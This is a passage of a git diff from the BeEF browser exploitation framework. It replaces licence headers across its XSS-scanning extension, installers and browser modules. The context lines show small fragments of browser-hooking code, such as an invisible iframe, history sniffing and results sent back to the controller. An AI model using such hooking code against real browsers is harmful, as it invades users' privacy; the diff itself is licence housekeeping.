-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
   module Extension
diff --git a/extensions/xssrays/config.yaml b/extensions/xssrays/config.yaml
index 84d136b5a..20b710e62 100644
--- a/extensions/xssrays/config.yaml
+++ b/extensions/xssrays/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     extension:
diff --git a/extensions/xssrays/controllers/xssrays.rb b/extensions/xssrays/controllers/xssrays.rb
index c951f62e5..d8ea2f3fe 100644
--- a/extensions/xssrays/controllers/xssrays.rb
+++ b/extensions/xssrays/controllers/xssrays.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module Extension
diff --git a/extensions/xssrays/extension.rb b/extensions/xssrays/extension.rb
index 4c024aed9..1f2f75e40 100644
--- a/extensions/xssrays/extension.rb
+++ b/extensions/xssrays/extension.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module Extension
diff --git a/extensions/xssrays/handler.rb b/extensions/xssrays/handler.rb
index 500e7965e..abc6eaea4 100644
--- a/extensions/xssrays/handler.rb
+++ b/extensions/xssrays/handler.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
   module Extension
diff --git a/extensions/xssrays/models/xssraysdetail.rb b/extensions/xssrays/models/xssraysdetail.rb
index 8201e7b91..09993368b 100644
--- a/extensions/xssrays/models/xssraysdetail.rb
+++ b/extensions/xssrays/models/xssraysdetail.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module Core
diff --git a/extensions/xssrays/models/xssraysscan.rb b/extensions/xssrays/models/xssraysscan.rb
index 544cb251b..e055d1f29 100644
--- a/extensions/xssrays/models/xssraysscan.rb
+++ b/extensions/xssrays/models/xssraysscan.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module Core
diff --git a/install b/install
index 62bf0534e..a8e0cbe17 100755
--- a/install
+++ b/install
@@ -1,19 +1,9 @@
 #!/usr/bin/env ruby
 
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 
 puts "\nWelcome to the BeEF installer!"
diff --git a/install-beef b/install-beef
index 5428316c6..ca5b7853a 100644
--- a/install-beef
+++ b/install-beef
@@ -1,18 +1,8 @@
 #!/bin/bash
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 
 clear
diff --git a/modules/browser/browser_fingerprinting/command.js b/modules/browser/browser_fingerprinting/command.js
index 3f9012df6..5e21d4775 100644
--- a/modules/browser/browser_fingerprinting/command.js
+++ b/modules/browser/browser_fingerprinting/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
 
 	var browser_type = new Array;
diff --git a/modules/browser/browser_fingerprinting/config.yaml b/modules/browser/browser_fingerprinting/config.yaml
index 0e9c2ea94..e5a8b5437 100644
--- a/modules/browser/browser_fingerprinting/config.yaml
+++ b/modules/browser/browser_fingerprinting/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/browser/browser_fingerprinting/module.rb b/modules/browser/browser_fingerprinting/module.rb
index ad2157d29..d15b057f5 100644
--- a/modules/browser/browser_fingerprinting/module.rb
+++ b/modules/browser/browser_fingerprinting/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 # Uses methods described here:
 # http://www.itsecuritysolutions.org/2010-03-29_fingerprinting_browsers_using_protocol_handlers/
diff --git a/modules/browser/detect_firebug/command.js b/modules/browser/detect_firebug/command.js
index 6887c3554..bf656bc2d 100644
--- a/modules/browser/detect_firebug/command.js
+++ b/modules/browser/detect_firebug/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
 	var result = "Not in use or not installed";
 	if (window.console && (window.console.firebug || window.console.exception)) result = "Enabled and in use!";
diff --git a/modules/browser/detect_firebug/config.yaml b/modules/browser/detect_firebug/config.yaml
index 50f54194b..10e011191 100644
--- a/modules/browser/detect_firebug/config.yaml
+++ b/modules/browser/detect_firebug/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/browser/detect_firebug/module.rb b/modules/browser/detect_firebug/module.rb
index 326d375d2..4a1515fc9 100644
--- a/modules/browser/detect_firebug/module.rb
+++ b/modules/browser/detect_firebug/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Detect_firebug < BeEF::Core::Command
 
diff --git a/modules/browser/detect_popup_blocker/command.js b/modules/browser/detect_popup_blocker/command.js
index 3f634be3d..cf64e2e21 100644
--- a/modules/browser/detect_popup_blocker/command.js
+++ b/modules/browser/detect_popup_blocker/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
 	
 	beef.net.send("<%= @command_url %>", <%= @command_id %>, "popup_blocker_enabled="+beef.browser.popup.blocker_enabled());
diff --git a/modules/browser/detect_popup_blocker/config.yaml b/modules/browser/detect_popup_blocker/config.yaml
index 2a1789fac..c5cee313a 100644
--- a/modules/browser/detect_popup_blocker/config.yaml
+++ b/modules/browser/detect_popup_blocker/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/browser/detect_popup_blocker/module.rb b/modules/browser/detect_popup_blocker/module.rb
index 85f4bc718..285d69ebe 100644
--- a/modules/browser/detect_popup_blocker/module.rb
+++ b/modules/browser/detect_popup_blocker/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Detect_popup_blocker < BeEF::Core::Command
 
diff --git a/modules/browser/detect_unsafe_activex/command.js b/modules/browser/detect_unsafe_activex/command.js
index b83317dec..cae5083bf 100644
--- a/modules/browser/detect_unsafe_activex/command.js
+++ b/modules/browser/detect_unsafe_activex/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
 
 	var unsafe = true;
diff --git a/modules/browser/detect_unsafe_activex/config.yaml b/modules/browser/detect_unsafe_activex/config.yaml
index 6cb65983d..a64fe7fcf 100644
--- a/modules/browser/detect_unsafe_activex/config.yaml
+++ b/modules/browser/detect_unsafe_activex/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/browser/detect_unsafe_activex/module.rb b/modules/browser/detect_unsafe_activex/module.rb
index 9f7947d56..5504ceec2 100644
--- a/modules/browser/detect_unsafe_activex/module.rb
+++ b/modules/browser/detect_unsafe_activex/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Detect_unsafe_activex < BeEF::Core::Command
 
diff --git a/modules/browser/get_visited_domains/command.js b/modules/browser/get_visited_domains/command.js
index d2c04fac1..7e55b8b8c 100644
--- a/modules/browser/get_visited_domains/command.js
+++ b/modules/browser/get_visited_domains/command.js
@@ -1,19 +1,10 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
 
+
 var hidden_iframe = beef.dom.createInvisibleIframe();
 hidden_iframe.setAttribute('id','f');
 hidden_iframe.setAttribute('name','f');		
diff --git a/modules/browser/get_visited_domains/config.yaml b/modules/browser/get_visited_domains/config.yaml
index ee2921948..b552f4e10 100644
--- a/modules/browser/get_visited_domains/config.yaml
+++ b/modules/browser/get_visited_domains/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/browser/get_visited_domains/module.rb b/modules/browser/get_visited_domains/module.rb
index 8effcac55..206e41243 100644
--- a/modules/browser/get_visited_domains/module.rb
+++ b/modules/browser/get_visited_domains/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 
 class Get_visited_domains < BeEF::Core::Command
diff --git a/modules/browser/get_visited_urls/command.js b/modules/browser/get_visited_urls/command.js
index acffd1b22..a31bfe665 100644
--- a/modules/browser/get_visited_urls/command.js
+++ b/modules/browser/get_visited_urls/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
 	var results = beef.browser.hasVisited("<%== format_multiline(@urls) %>");
 	var comp = '';
diff --git a/modules/browser/get_visited_urls/config.yaml b/modules/browser/get_visited_urls/config.yaml
index 02f2cc7b2..81363c1ae 100644
--- a/modules/browser/get_visited_urls/config.yaml
+++ b/modules/browser/get_visited_urls/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/browser/get_visited_urls/module.rb b/modules/browser/get_visited_urls/module.rb
index 5cd8626a5..4454023e6 100644
--- a/modules/browser/get_visited_urls/module.rb
+++ b/modules/browser/get_visited_urls/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Get_visited_urls < BeEF::Core::Command
   
diff --git a/modules/browser/hooked_domain/ajax_fingerprint/command.js b/modules/browser/hooked_domain/ajax_fingerprint/command.js
index ccb2bf83c..5fb2bf6c3 100644
--- a/modules/browser/hooked_domain/ajax_fingerprint/command.js
+++ b/modules/browser/hooked_domain/ajax_fingerprint/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
              
      //Regular expression to match script names in source 
diff --git a/modules/browser/hooked_domain/ajax_fingerprint/config.yaml b/modules/browser/hooked_domain/ajax_fingerprint/config.yaml
index 8216f7223..1458ac7ae 100644
--- a/modules/browser/hooked_domain/ajax_fingerprint/config.yaml
+++ b/modules/browser/hooked_domain/ajax_fingerprint/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/browser/hooked_domain/alert_dialog/command.js b/modules/browser/hooked_domain/alert_dialog/command.js
index a5f5e57c5..81d57d9e7 100644
--- a/modules/browser/hooked_domain/alert_dialog/command.js
+++ b/modules/browser/hooked_domain/alert_dialog/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
 	alert("<%== format_multiline(@text) %>");
 	
diff --git a/modules/browser/hooked_domain/alert_dialog/config.yaml b/modules/browser/hooked_domain/alert_dialog/config.yaml
index 2b9c05a1b..2ff2ea2d0 100644
--- a/modules/browser/hooked_domain/alert_dialog/config.yaml
+++ b/modules/browser/hooked_domain/alert_dialog/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
